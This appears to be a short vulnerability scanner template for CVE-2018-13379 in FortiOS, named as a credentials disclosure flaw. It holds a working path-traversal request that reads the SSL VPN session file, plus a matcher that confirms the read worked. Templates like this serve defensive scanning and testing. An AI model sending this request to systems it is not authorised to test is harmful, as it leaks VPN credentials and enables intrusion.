id: cve-2018-13379 info: name: FortiOS - Credentials Disclosure author: organiccrap severity: high requests: - method: GET path: - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" matchers: - type: word words: - "var fgt_lang ="